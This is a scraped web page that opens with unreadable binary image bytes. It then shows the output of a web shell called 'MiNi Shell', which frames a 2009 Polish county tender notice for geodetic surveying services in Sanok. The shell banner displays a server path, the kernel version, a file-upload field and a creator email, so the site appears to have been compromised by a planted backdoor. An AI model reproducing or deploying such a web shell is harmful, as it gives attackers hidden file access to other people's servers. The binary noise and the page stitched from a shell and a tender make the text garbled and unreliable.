JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090505/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090505/69805-N-2009.html

<p class="kh_header"><b>Sanok: Usługi geodezyjne dla Powiatu Sanockiego</b><br>
<b>Numer ogłoszenia: 69805 - 2009; data zamieszczenia: 05.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Sanocki , ul. Rynek 1, 38-500 Sanok, woj. podkarpackie, tel. 013 4652900, faks 013 4652988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-sanok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi geodezyjne dla Powiatu Sanockiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 

Wykonanie robót geodezyjnych dla Powiatu Sanockiego
Szczegółowy opis przedmiotu zamówienia zawierają  załączniki do SIWZ nr : 1(a, b, c, d, e), - warunki techniczne (wraz z mapami sytuacyjnymi) stanowiące załącznik do specyfikacji
Opis części zamówienia:
Zamówienie składa się z następujących części (zadań) opisanych poniżej.

Zadanie nr 1:
Modernizacja operatu ewidencji gruntów i budynków Obrębu Tarnawa Górna gm. Zagórz

Zadanie nr 2:
Modernizacja operatu ewidencji gruntów i budynków obrębu Zarszyn, Gm. Zarszyn. Opracowanie numerycznej mapy zasadniczej obrębu Zarszyn Gm. Zarszyn  

Zadanie nr 3 
Modernizacja operatu ewidencji gruntów i budynków obrębu Posada Zarszyn gm. Zarszyn. Opracowanie numerycznej mapy zasadniczej obrębu Posada Zarszyn gm. Zarszyn. 

Zadanie nr 4  
Modernizacja operatu ewidencji gruntów i budynków obrębu Długie gm. Zarszyn. Opracowanie numerycznej mapy zasadniczej obrębu Długie gm. Zarszyn

zadanie nr 5 
Modernizacja operatu ewidencji gruntów i budynków obrębu Nowosielce gm. Zarszyn Opracowanie  numerycznej mapy zasadniczej obrębu Nowosielce gm. Zarszyn ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.50.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą się ubiegać wykonawcy:
spełniający warunki zawarte w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych

Warunki szczegółowe:
- dysponujący co najmniej czterema osobami posiadającymi uprawnienia w dziedzinie geodezji i kartografii w zakresie określonym w art. 43 pkt 1 i 2 ustawy Prawo Geodezyjne i Kartograficzne (tekst. jedn. Dz. U. z 2005r. Nr 240 poz. 2027)
- którzy w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie (licząc wstecz od dnia wszczęcia postępowania) wykonywali co najmniej dwie prace o podobnym lub takim samym charakterze co przedmiot zamówienia, tj. odpowiadające swoją wartością przedmiotowi zamówienia oraz wykonywane były na obszarze zbliżonym do obszaru przedmiotu zamówienia
- wykażą przychód za ostatni rok obrotowy w wysokości co najmniej 2 - krotności ceny oferowanej za wykonanie przedmiotu zamówienia
- dysponujący odpowiednim sprzętem niezbędnym do realizacji przedmiotu zamówienia, tj. co najmniej dwoma tachimetrami elektronicznymi 
- posiadający licencję na oprogramowanie MICROSTATION, EWRYS,  przeglądarkę VEWID, TOPO lub równoważne.
- którzy udzielą gwarancji na wykonanie przedmiotu zamówienia na okres 5-ciu lat

UWAGA: wykonawcy winni wykazać przeszkolenie osób w zakresie obsługi programu EWID 2000 lub programów równoważnych oraz licencję na oprogramowanie MICROSTATION, EWRYS,  przeglądarkę VEWID, TOPO lub programy i przeglądarki równoważne.
Komisja przetargowa oceni spełnianie przez wykonawców powyższych warunków na podstawie wymaganych przez zamawiającego dokumentów.
Ocena spełniania przedmiotowych warunków odbędzie się na zasadzie spełnia/nie spełnia. Nie spełnienie któregokolwiek z warunków skutkować będzie wykluczeniem wykonawcy i odrzuceniem jego oferty.

Uwaga: Warunki powyższe powinni spełnić wykonawcy składający oferty na całość postępowania jak i tylko na jedną część..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a Wypełniony formularz oferty zgodnie ze wzorem stanowiącym załącznik nr 2 do SIWZ.
b Oświadczenie w trybie art. 44 ustawy Prawo zamówień publicznych o spełnianiu warunków określonych w art. 22 ust. 1 ustawy 
Prawo zamówień publicznych zgodnie ze wzorem stanowiącym załącznik nr 3 do SIWZ. W przypadku wykonawców wspólnie ubiegający się o udzielenie zamówienia - wszyscy wykonawcy ubiegający się o udzielenie zamówienia składają oświadczenie w trybie art. 44 ustawy Prawo zamówień publicznych.
c Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie 
o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż na 6 miesięcy przed upływem terminu składania ofert
d  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo osoby reprezentującej wspólnie działających wykonawców, określające postępowanie do którego się odnosi, precyzujące zakres umocowania, oraz określające osobę pełnomocnika i wykonawców udzielających pełnomocnictwa. 
e  Oświadczenie o ewentualnym powierzeniu ( bądź nie powierzeniu) części prac podwykonawcom (zakres prac powierzonych, nazwa i adres podmiotu występującego jako podwykonawca). Wykonawca załącza zobowiązanie podwykonawcy do współpracy przy wykonywaniu tego konkretnego zadania.
f  Wykaz wykonanych w okresie ostatnich trzech lat, a  jeżeli okres prowadzenia działalności jest krótszy - w tym okresie (licząc wstecz od daty wszczęcia postępowania) usług, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot niniejszego zamówienia,                z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że usługi te zostały wykonane należycie - np. referencji  (wg wzoru stanowiącego załącznik nr 4 do SIWZ).
g  Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia,              a także zakresu wykonywanych przez nie czynności (wg wzoru stanowiącego załącznik nr 5 do SIWZ) oraz załączenia właściwych dokumentów potwierdzających posiadanie uprawnień i kwalifikacji o których mowa w pkt. 4 SIWZ (wymagane warunki udziału w postępowaniu) - wymagane dokumenty wymienia się w punktach poniższych 
h  Uprawnienia geodezyjne w dziedzinie geodezji i kartografii w zakresie określonym w art. 43 pkt 1 i 2 ustawy Prawo Geodezyjne i Kartograficzne
i  Uprawnienia do aktualizacji użytków gruntowych (zaświadczenie właściwego wojewody, dla osób wykonujących w ramach wykonywanego zadania czynności wymagające takich uprawnień - zadań nr 1, 2,3,4,5) 
j  W przypadku gdy osoba, która będzie wykonywała zamówienie lub będzie uczestniczyła w wykonywaniu zamówienia, nie jest pracownikiem wykonawcy, do oferty dołączyć należy zobowiązanie takiej osoby do współpracy przy wykonywaniu tego konkretnego zamówienia.
k  Wykaz sprzętu niezbędnego do realizacji przedmiotu zamówienia zgodnie ze wzorem stanowiącym załącznik nr 6 do SIWZ
l  Licencja na oprogramowanie MIKROSTATION, EWRYS, lub oprogramowanie równoważne
m Dokument potwierdzający przeszkolenie osób w zakresie obsługi programu EWID 2000 lub programów równoważnych 
n  Sprawozdanie finansowe za rok 2008 lub jego część obejmująca bilans oraz rachunek zysków i strat, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o badanym sprawozdaniu lub jego części obejmującej bilans i rachunek zysków i strat, albo w przypadku wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności za rok 2008
o  Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o których mowa w punkcie  c składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości,
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w punkcie c, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
Dokument ten winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert

Dokumenty należy przedłożyć w formie oryginału lub kserokopii potwierdzonej za zgodność z oryginałem przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-sanok.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Sanoku , ul. Rynek 1 , 38-500 Sanok.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2009 godzina 10:00, miejsce: Starostwo Powiatowe w sanoku, ul. Rynek 1 , 38-500 Sanok, biuro podawcze - parter budynku.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Modernizacja operatu ewidencji gruntów i budynków Obrębu Tarnawa Górna gm. Zagórz.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zgodnie z załącznikiem nr 1 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.50.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Modernizacja operatu ewidencji gruntów i budynków obrębu Zarszyn, Gm. Zarszyn. Opracowanie numerycznej mapy zasadniczej obrębu Zarszyn Gm. Zarszyn.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zgodnie z załącznikiem nr 1 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.50.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Modernizacja operatu ewidencji gruntów i budynków obrębu Posada Zarszyn gm. Zarszyn. Opracowanie numerycznej mapy zasadniczej obrębu Posada Zarszyn gm. Zarszyn..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zgodnie załącznikiem nr 1 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.50.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Modernizacja operatu ewidencji gruntów i budynków obrębu Długie gm. Zarszyn. Opracowanie numerycznej mapy zasadniczej obrębu Długie gm. Zarszyn.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zgodnie z załącznikiem nr 1 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.50.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Modernizacja operatu ewidencji gruntów i budynków obrębu Nowosielce gm. Zarszyn Opracowanie  numerycznej mapy zasadniczej obrębu Nowosielce gm. Zarszyn ..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zgodnie z załąvcznikiem nr 1 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.35.50.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com